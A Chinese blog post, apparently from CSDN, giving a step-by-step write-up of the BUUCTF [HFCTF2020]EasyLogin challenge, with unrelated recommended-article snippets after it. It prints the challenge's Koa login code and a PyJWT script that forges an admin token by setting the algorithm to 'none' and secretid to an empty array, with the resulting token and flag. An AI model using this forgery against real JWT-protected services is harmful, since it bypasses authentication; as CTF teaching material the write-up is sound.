BUUCTF---[HFCTF2020]EasyLogin保姆级详解。

最新推荐文章于 2024-07-24 14:08:33 发布
最新推荐文章于 2024-07-24 14:08:33 发布
阅读量1.2k 收藏 5
点赞数 3
分类专栏: BUUCTF 文章标签: 安全 javascript php 网络安全 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62107966/article/details/126801065
版权

 

题目链接: BUUCTF在线评测

考点

分析

下面是修改前后这些值的注意事项:

题目链接: BUUCTF在线评测

考点:

JS代码审计

jwt漏洞破解

分析:

打开题目,给了个登录框

 

 没发现什么可以利用的,查看源代码,点击康康:

 

 

 分析可知,该题采用了koa框架,在getflag函数里发现有个/api/flag,应该是有返回flag的函数。

接着的话先附上koa项目的文件框架:

 按照koa框架的常见结构去获取下控制器文件的源码。

/controllers/api.js

访问得到整个题目的源代码:

const crypto = require('crypto');
const fs = require('fs')
const jwt = require('jsonwebtoken')

const APIError = require('../rest').APIError;

module.exports = {
    'POST /api/register': async (ctx, next) => {
        const {username, password} = ctx.request.body;

        if(!username || username === 'admin'){
            throw new APIError('register error', 'wrong username');
        }

        if(global.secrets.length > 100000) {
            global.secrets = [];
        }

        const secret = crypto.randomBytes(18).toString('hex');
        const secretid = global.secrets.length;
        global.secrets.push(secret)

        const token = jwt.sign({secretid, username, password}, secret, {algorithm: 'HS256'});

        ctx.rest({
            token: token
        });

        await next();
    },

    'POST /api/login': async (ctx, next) => {
        const {username, password} = ctx.request.body;

        if(!username || !password) {
            throw new APIError('login error', 'username or password is necessary');
        }

        const token = ctx.header.authorization || ctx.request.body.authorization || ctx.request.query.authorization;

        const sid = JSON.parse(Buffer.from(token.split('.')[1], 'base64').toString()).secretid;

        console.log(sid)

        if(sid === undefined || sid === null || !(sid < global.secrets.length && sid >= 0)) {
            throw new APIError('login error', 'no such secret id');
        }

        const secret = global.secrets[sid];

        const user = jwt.verify(token, secret, {algorithm: 'HS256'});

        const status = username === user.username && password === user.password;

        if(status) {
            ctx.session.username = username;
        }

        ctx.rest({
            status
        });

        await next();
    },

    'GET /api/flag': async (ctx, next) => {
        if(ctx.session.username !== 'admin'){
            throw new APIError('permission error', 'permission denied');
        }

        const flag = fs.readFileSync('/flag').toString();
        ctx.rest({
            flag
        });

        await next();
    },

    'GET /api/logout': async (ctx, next) => {
        ctx.session.username = null;
        ctx.rest({
            status: true
        })
        await next();
    }
};

重点看看这两个函数,一个是生成jwt的,另一个是返回flag的。

 

 注意到/apu/flag路径校验为admin用户时才会返回flag,而登录验证方式采用的是JWT,所以可以尝试对JWT进行破解修改。,并且生成JWT是用HS256加密,可以把它改为none来进行破解。标题中的alg字段更改为none,有些JWT库支持无算法,即没有签名算法。当alg为none时,后端将不执行签名验证。 此外对于本题中验证采用的密匙secret值也需要为空或者undefined否则还是会触发验证,所以将JWT中secretid项修改为[]

综上所述,一共要修改三个地方:

第一个是username,修改为admin

第二个是alog,修改为none

第三个是secretid,修改为[]

下面是修改前后这些值的注意事项:

首先,要获取自己的jwt值,需要用burpsuite登录抓包,如下图:

 然后复制authorization后面的内容,也就是你自己的jwt,放到JSON Web Tokens - jwt.io,查看各个值:

 按照刚刚要修改的三个值修改,由于要修改alg为none,在网页上无法直接获取新的jwt,所以用python脚本生成,在此之前先用pip安装好生成jwt的库:PyJWT库。

脚本如下:

 值得注意的是这里的iat,是要用你自己在burpsuite里拿到的jwt里的iat值。运行得到新的jwt值。

import jwt
token = jwt.encode(
{
  "secretid": [],
  "username": "admin",
  "password": "123456",
  "iat": 1662825424
},
algorithm="none",key="").encode(encoding='utf-8')

print(token)

eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJzZWNyZXRpZCI6W10sInVzZXJuYW1lIjoiYWRtaW4iLCJwYXNzd29yZCI6IjEyMzQ1NiIsImlhdCI6MTY2MjgyNTQyNH0.

返回burpsuite:

 确定username为admin,且jwt为新生成的jwt后,放包,回到浏览器,访问

/api/flag

拿到flag:

  

flag{b5f20dce-277f-4004-8c99-161af08272b2}

到这里该题就解到这里了,这里附上一道也是jwt类型的题目:

[2019 CISCN ]华北赛区 Day1 Web2:BUUCTF在线评测,题目是关于ikun的噢。

写的一般,见谅!不懂的欢迎私信!

谢谢点赞!

泪涌@
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
大数据学前准备--zookeeper详解与集群搭建(保姆级教程)
wudidahuanggua的博客
09-13 4330
深度解析zookeeper理论知识以及手把手教你搭建起集群,保姆级的教程。点赞收藏一点也不亏吖!
保姆级 Keras 实现 Faster R-CNN 十二 示例代码
09-04
保姆级 Keras 实现 Faster R-CNN 十二 Jupyter notebook 示例代码. 此部分完成了 Faster R-CNN 前向计算模型, 还不能训练, 并不是完整的 Faster R-CNN 代码. 具体可参考 ...
[HFCTF2020]EasyLogin --不会编程崽
不会编程的崽的博客
02-22 555
koa&jwt伪造
2021MySql-8.0.26安装详细教程(保姆级)
热门推荐
铁锈侠的博客
07-30 73万+
MySql-8.0.26安装详细教程保姆级下载安装包安装配置配置环境变量 下载安装包 下载安装包: 下载网址: https://dev.mysql.com/downloads/ 选择这个 进入后选择 直接下载第一个 点击这里,开始下载 安装配置 解压安装包 我这里解压到d盘 打开 编写MySQL配置文件 在解压目录下新建my.ini文件 将下面文本拷贝进my,ini文件中 [mysqld] # 设置3306端口 port=3306 # 设置mysql的安装目录 ----------是你的文件路径-
Qwen-14B-Chat-Int4 保姆级微调详细步骤
weixin_43907339的博客
01-16 4777
Qwen-14B-Chat-Int4 微调详细步骤
PyQt5保姆级教程-- 从入门到精通
m0_57021623的博客
03-13 25万+
PyQt5保姆级教程-- 从入门到精通 1 Qt Designer 2 PyQt5基本窗口控件(QMainWindow、Qwidget、Qlabel、QLineEdit、菜单、工具栏等) 3 PyQt5高级组件(QTableView、QListView、容器、线程等) 4 PyQt5布局管理(QBoxLayout、QGirdLayout、QFormLayout、嵌套布局等) 5 PyQt5信号与槽(事件处理、数据传递等) 6 PyQt5图形与特效(定制窗口风格、绘
Maven里的Plugins报错-保姆级解决方案
weixin_54246980的博客
03-28 2880
1.在IDEA中ctrl+alt+shift+s,打开后按住shift全选后点“-”号。然后应该就没又报错了,如果还有就重复几次。
DB-GPT 保姆级安装教程
weixin_43907339的博客
01-31 2015
如果启动 Qwen-14B-Chat-Int4 模型 还需要在DB-GPT/models/Qwen-14B-Chat-Int4/config.json这配置。环境变量配置, 配置LLM_MODEL参数在 `.env` 文件中。可能会报错 是有包没有安装 安装即可 希望能帮到大家。
社区版IDEA 搭建Javaweb项目完整版--保姆级教程
weixin_69491512的博客
01-30 1万+
社区版IDEA 搭建Javaweb项目完整版--保姆级教程 官网下载Tomcat然后在idea中安装Tomcat插件搭建web项目提供两种方法 然后补全Javaweb的文件结构。1.设置中配置Tomcat 2.为项目添加Tomcat 3.添加Tomcat依赖的jar包然后检测搭建是否成功
机器学习神器Scikit-learn保姆级入门教程
尤尔小屋
01-30 2776
Scikit-learn保姆级入门教程 Scikit-learn是一个非常知名的Python机器学习库,它广泛地用于统计分析和机器学习建模等数据科学领域。 建模无敌:用户通过scikit-learn能够实现各种监督和非监督学习的模型 功能多样:同时使用sklearn还能够进行数据的预处理、特征工程、数据集切分、模型评估等工作 数据丰富:内置丰富的数据集,比如:泰坦尼克、鸢尾花等,数据不再愁啦 本篇文章通过简明快要的方式来介绍scikit-learn的使用,更多详细内容请参考官网: 内置数据集使用 数据
保姆级 Keras 实现 Faster R-CNN 十一 示例代码
09-02
保姆级 Keras 实现 Faster R-CNN 十一 Jupyter notebook 示例代码. 此部分增加了 RoiPoolingLayer 自定义层, 实现了感兴趣区域转换为固定大小的特征图, 并不是完整的 Faster R-CNN 代码. 具体可参考 ...
保姆级 Keras 实现 Faster R-CNN 十 示例代码
08-28
保姆级 Keras 实现 Faster R-CNN 十 Jupyter notebook 示例代码. 此部分增加了 ProposalLayer 自定义层, 实现了输出建议区域矩形的功能, 并不是完整的 Faster R-CNN 代码. 具体可参考 ...
保姆级 Keras 实现 Faster R-CNN 三 示例代码
08-17
保姆级 Keras 实现 Faster R-CNN 三 Jupyter notebook 示例代码. 此部分只实现了如何计算 IoU 来判定哪些 anchor_box 是正样本, 哪些是负样本, 并从 xml 文件中读入标签数据. 并不是完整的 Faster R-CNN 代码. 具体...
保姆级 Keras 实现 Faster R-CNN 五 示例代码
08-18
保姆级 Keras 实现 Faster R-CNN 五 Jupyter notebook 示例代码. 此部分只实现了 RPN 网络分类损失函数和精度计算函数, 并训练分类型, 并不是完整的 Faster R-CNN 代码. 具体可参考 ...
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
lupai的博客
07-24 410
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
大坝安全监测设备有哪些主要功能?
最新发布
yyth13276363312的博客
07-24 283
12。3. **实时预警和报警处理**:提供精准的安全预警信息,及时处理可能的危险情况12。1. **实时监测大坝的各项物理参数**:包括应变、位移、水位、流量等12。6. **环境量监测**:包括上/下游水位、气温、降水量等11
网络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 1052
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
内网安全:IPC横向
8888的博客
07-23 675
IPC是为了实现进程之间的通信而开放的管道。IPC可以通过验证用户名和密码来获取相应的权限。通过IPC可以与目标机器建立连接。
vue dhtmlx-gantt 导出excel 保姆级完整教程
07-14
当涉及到 Vue DHTMLX-Gantt 导出 Excel 的保姆级完整教程时,以下是一步一步的指南: 1. 确保您的项目中已经安装了 Vue 和 DHTMLX-Gantt。如果尚未安装,请使用以下命令进行安装: ```bash npm install vue dhtmlx-gantt ``` 2. 在您的 Vue 组件中引入所需的库和样式: ```javascript import 'dhtmlx-gantt'; import 'dhtmlx-gantt/codebase/dhtmlxgantt.css'; ``` 3. 创建一个 Vue 组件,并在模板中添加一个 Gantt 图表和一个按钮: ```html <template> <div ref="ganttContainer" style="width: 100%; height: 600px;"></div> <button @click="exportData">导出 Excel</button> </template> <script> import * as XLSX from 'xlsx'; import FileSaver from 'file-saver'; export default { mounted() { const ganttContainer = this.$refs.ganttContainer; gantt.init(ganttContainer); // 设置 Gantt 图表的配置和数据 // 示例数据 const tasks = [ { id: 1, text: '任务1', start_date: '2022-01-01', duration: 5, progress: 0.5 }, { id: 2, text: '任务2', start_date: '2022-01-06', duration: 4, progress: 0.2 }, // 其他任务... ]; gantt.parse({ data: tasks }); }, methods: { exportData() { const gantt = this.$refs.ganttContainer.$gantt; const tasks = gantt.getDatastore('task').getItems(); // 将任务数据转换为 Excel 数据格式 const data = tasks.map((task) => { return { id: task.id, text: task.text, start_date: task.start_date, duration: task.duration, progress: task.progress, }; }); // 创建 Excel 文件 const worksheet = XLSX.utils.json_to_sheet(data); const workbook = XLSX.utils.book_new(); XLSX.utils.book_append_sheet(workbook, worksheet, 'Gantt Data'); const excelBuffer = XLSX.write(workbook, { bookType: 'xlsx', type: 'array' }); const excelData = new Blob([excelBuffer], { type: 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet' }); // 下载 Excel 文件 FileSaver.saveAs(excelData, 'gantt_data.xlsx'); }, }, }; </script> <style> /* 可选的样式 */ </style> ``` 4. 在上述示例代码中,需要注意以下部分: - 在 `mounted` 钩子中,使用 `gantt.init(ganttContainer)` 初始化 Gantt 图表,并根据您的需求设置其配置和数据。 - `exportData` 方法用于将 Gantt 图表数据导出到 Excel。确保在 `exportData` 方法中的 `this.$refs.ganttContainer.$gantt` 是对 Gantt 图表组件的正确引用。 - 点击 "导出 Excel" 按钮时,将会生成一个名为 `gantt_data.xlsx` 的 Excel 文件,其中包含了 Gantt 图表的数据。 这就是使用 Vue DHTMLX-Gantt 导出 Excel 的保姆级完整教程。希望对您有所帮助!如果您有任何其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值